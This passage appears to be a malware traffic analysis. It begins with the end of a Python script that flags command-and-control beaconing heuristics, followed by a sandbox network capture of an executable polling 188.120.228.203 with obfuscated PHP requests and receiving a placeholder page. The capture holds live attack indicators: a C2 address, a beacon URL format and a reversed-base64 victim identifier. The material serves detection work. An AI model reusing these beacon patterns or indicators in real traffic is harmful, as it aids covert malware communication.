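    return text if re.fullmatch(r"[0-9a-f]{32,64}", text) else None


def process_location_anomaly(path):
    """True when a well-known system binary name runs outside System32/SysWOW64."""
    directory, name = ntpath.split(path.lower())
    return name in SYSTEM_BINARY_NAMES and directory not in SYSTEM_BINARY_DIRS


def beacon_indicators(process, raw_request):
    """Heuristic hits for one (process path, raw request) pair, in a fixed order."""
    request_line, h = parse_message(raw_request)
    method, target, _ = request_line.split(" ", 2)
    url = urlsplit(target)
    params = parse_qsl(url.query, keep_blank_values=True)
    keys = [k for k, _ in params]
    hits = []
    if process_location_anomaly(process):
        hits.append("system-binary-name-outside-system-dir")
    if method == "GET" and "content-type" in h:  # a body-less GET has no reason to send one
        hits.append("content-type-on-bodyless-get")
    if MOBILE_UA.search(h.get("user-agent", "")):  # phone UA from a Windows process
        hits.append("mobile-user-agent-from-windows-process")
    if IPV4.fullmatch(h.get("host", "")):
        hits.append("bare-ip-host-header")
    if url.path.count("/") >= 8 and url.path.endswith(".php"):
        hits.append("deep-word-salad-path-to-php")
    if len(keys) != len(set(keys)):  # same key=value repeated inside one query
        hits.append("duplicate-query-keys")
    if any(reversed_base64_hex(v) for _, v in params):
        hits.append("reversed-base64-hex-parameter")
    return hits


def static_file_reply_to_php(raw_response_head):
    """nginx adds ETag and Last-Modified when it serves a file from disk; a .php handler
    normally does not, so such a reply is a placeholder page rather than C2 tasking."""
    _, h = parse_message(raw_response_head)
    return "etag" in h and "last-modified" in h and h.get("server", "").startswith("nginx")


if __name__ == "__main__":
    print(beacon_indicators(SESSION0_PROCESS, SESSION0_REQUEST))
    print(beacon_indicators(BENIGN_PROCESS, BENIGN_REQUEST))
    print(static_file_reply_to_php(SESSION0_RESPONSE_HEADERS))
```

Run as-is to print the hits for both cases; the same functions accept any (process path, raw request head) pair lifted from a proxy log. The reversed-base64 check is deliberately strict (the decode must be pure hex of plausible hash length) so it stays quiet on ordinary base64 parameters, and the static-file check is only meaningful when the request targeted a server-side script, as every request in this capture did.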


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49746 | 188.120.228.203 | 80 | 8000 | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 04:02:16.107333899 CET | 860 | OUT | GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/plain
                                              User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                                              Host: 188.120.228.203
                                              Connection: Keep-Alive
Nov 27, 2024 04:02:17.428755045 CET | 241 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
Nov 27, 2024 04:02:17.428841114 CET | 1236 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" co
Nov 27, 2024 04:02:17.428879023 CET | 1236 | IN | Data Raw: 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69
                                              Data Ascii: ng:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:center;justify-content:c
Nov 27, 2024 04:02:17.429060936 CET | 448 | IN | Data Raw: 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 30 36 32 35 72 65 6d 3b 66 6f 6e
                                              Data Ascii: fy-content:center;align-items:center;text-align:center;border-radius:1.0625rem;font-weight:500;padding:.375rem .8125rem}@media (min-width:45.625em){.window-main__actions,.window-main__body{margin-top:1.875rem}.window-main{padding:3.75rem 8.937
Nov 27, 2024 04:02:17.429070950 CET | 1236 | IN | Data Raw: 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65
                                              Data Ascii: }@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-left:.5625rem}.window-main__ite
                                              Nov 27, 2024 04:02:17.429083109 CET1236INData Raw: 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e
                                              Data Ascii: n{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20rem)/ 25.625)}}@supports (paddin
                                              Nov 27, 2024 04:02:17.429092884 CET448INData Raw: 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 6e 66 6f 7b 6d 61
                                              Data Ascii: m:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.w
                                              Nov 27, 2024 04:02:17.429294109 CET1236INData Raw: 72 65 6d 20 2c 2e 34 36 34 39 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 36 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 30
                                              Data Ascii: rem ,.4649390244rem + .487804878vw ,.6875rem)}}@supports not (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:cla
                                              Nov 27, 2024 04:02:17.429363012 CET1236INData Raw: 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 30 5f 66
                                              Data Ascii: xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_5)"><path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 2
                                              Nov 27, 2024 04:02:17.429378986 CET448INData Raw: 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 31 32 34 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 35 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09
                                              Data Ascii: stdDeviation="124" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter1_f_2001_5" x="63.8591" y="146.319" width="394.544" height="426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
                                              Nov 27, 2024 04:02:17.548954010 CET1236INData Raw: 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 35 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09 09 09 09 09 3c 66 69 6c 74 65 72 20 69 64 3d 22 66 69 6c 74 65 72 32 5f 66 5f 32 30 30
                                              Data Ascii: ffect1_foregroundBlur_2001_5" /></filter><filter id="filter2_f_2001_5" x="59.2946" y="36.0856" width="514.378" height="571.162" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0"
                                              Nov 27, 2024 04:02:17.623728037 CET836OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/plain
                                              User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                                              Host: 188.120.228.203
                                              Nov 27, 2024 04:02:18.055687904 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes


                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                                              2           192.168.2.9  49767        188.120.228.203  80
                                              Timestamp  Bytes transferred  Direction  Data
                                              Nov 27, 2024 04:02:24.174798965 CET697OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                                              Host: 188.120.228.203
                                              Connection: Keep-Alive
                                              Nov 27, 2024 04:02:25.553308964 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Nov 27, 2024 04:02:25.553406000 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" co
                                              Nov 27, 2024 04:02:25.553419113 CET1236INData Raw: 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69
                                              Data Ascii: ng:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:center;justify-content:c
                                              Nov 27, 2024 04:02:25.553567886 CET1236INData Raw: 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 30 36 32 35 72 65 6d 3b 66 6f 6e
                                              Data Ascii: fy-content:center;align-items:center;text-align:center;border-radius:1.0625rem;font-weight:500;padding:.375rem .8125rem}@media (min-width:45.625em){.window-main__actions,.window-main__body{margin-top:1.875rem}.window-main{padding:3.75rem 8.937
                                              Nov 27, 2024 04:02:25.553580999 CET1236INData Raw: 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34 38 38 72 65 6d 20 2b 20 32 39 2e 30 32 34 33 39 30
                                              Data Ascii: rem)/ 25.625)}}@supports (padding-right:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-right:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)}}@supports not (padding-right:clamp(1.5rem ,-4.304878
                                              Nov 27, 2024 04:02:25.553594112 CET896INData Raw: 36 38 33 76 77 20 2c 32 2e 32 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 35 72 65 6d 20 2b 20 2e 37 35 2a 28 31 30 30 76 77 20 2d 20 32 30 72 65 6d 29 2f 20
                                              Data Ascii: 683vw ,2.25rem)){.window-main__title{font-size:calc(1.5rem + .75*(100vw - 20rem)/ 25.625)}}@supports (font-size:clamp(0.875rem ,0.7286585366rem + 0.7317073171vw ,1.0625rem)){.window-main__body{font-size:clamp(.875rem ,.7286585366rem + .7317073
                                              Nov 27, 2024 04:02:25.553744078 CET1236INData Raw: 72 65 6d 20 2c 2e 34 36 34 39 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 36 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 30
                                              Data Ascii: rem ,.4649390244rem + .487804878vw ,.6875rem)}}@supports not (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:cla
                                              Nov 27, 2024 04:02:25.553755999 CET224INData Raw: 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 30 5f 66
                                              Data Ascii: xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_5)"><path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.69
                                              Nov 27, 2024 04:02:25.553769112 CET1236INData Raw: 36 20 32 33 31 2e 31 33 33 20 33 36 33 2e 30 31 38 20 32 36 32 2e 33 35 36 20 33 38 31 2e 39 39 31 20 33 32 38 2e 39 39 43 32 38 37 2e 39 39 20 34 31 38 2e 34 37 32 20 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 20 33 36 30 2e 35 32 32 20 35 36
                                              Data Ascii: 6 231.133 363.018 262.356 381.991 328.99C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g><g opacity="0.7" filter="url(#filter1_f_2001_5)"><ellipse cx="50.6112" cy="60.3996" rx="50.6112" ry="60.3996"
                                              Nov 27, 2024 04:02:25.553782940 CET1236INData Raw: 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 46 6c 6f 6f 64 20 66 6c 6f 6f 64 2d 6f 70 61 63 69 74 79 3d 22 30 22 20 72 65 73 75 6c 74 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 2f 3e 0a 09 09
                                              Data Ascii: lters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBl
                                              Nov 27, 2024 04:02:25.673710108 CET1236INData Raw: 0a 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 22 3e 59 6f 75 72 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 6e 20 41 41 41 41 20 72 65 63 6f 72 64 2c 20 62 75 74 20 74 68 65 20 73 69 74 65
                                              Data Ascii: <li class="window-main__item">Your domain has an AAAA record, but the site only works with IPv4 on the server.</li></ul></div><div class="window-main__actions"><a href="https://kb.fastpanel.direct/troubleshoot
                                              Nov 27, 2024 04:02:25.676346064 CET673OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                                              Host: 188.120.228.203
                                              Nov 27, 2024 04:02:26.124521017 CET1236INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}button,input,textarea{font-family:Roboto;font-size:inherit;line-height:inherit;color:inherit;background-color:rgba(0,0,0,0)}input,textarea{width:


                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                                              3           192.168.2.9  49785        188.120.228.203  80
                                              Timestamp  Bytes transferred  Direction  Data
                                              Nov 27, 2024 04:02:31.998044968 CET731OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/csv
                                              User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
                                              Host: 188.120.228.203
                                              Connection: Keep-Alive
                                              Nov 27, 2024 04:02:33.365844011 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Nov 27, 2024 04:02:33.365963936 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" co
                                              Nov 27, 2024 04:02:33.366022110 CET1236INData Raw: 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69
                                              Data Ascii: ng:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:center;justify-content:c
                                              Nov 27, 2024 04:02:33.366034985 CET448INData Raw: 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 30 36 32 35 72 65 6d 3b 66 6f 6e
                                              Data Ascii: fy-content:center;align-items:center;text-align:center;border-radius:1.0625rem;font-weight:500;padding:.375rem .8125rem}@media (min-width:45.625em){.window-main__actions,.window-main__body{margin-top:1.875rem}.window-main{padding:3.75rem 8.937
                                              Nov 27, 2024 04:02:33.366108894 CET1236INData Raw: 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65
                                              Data Ascii: }@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-left:.5625rem}.window-main__ite
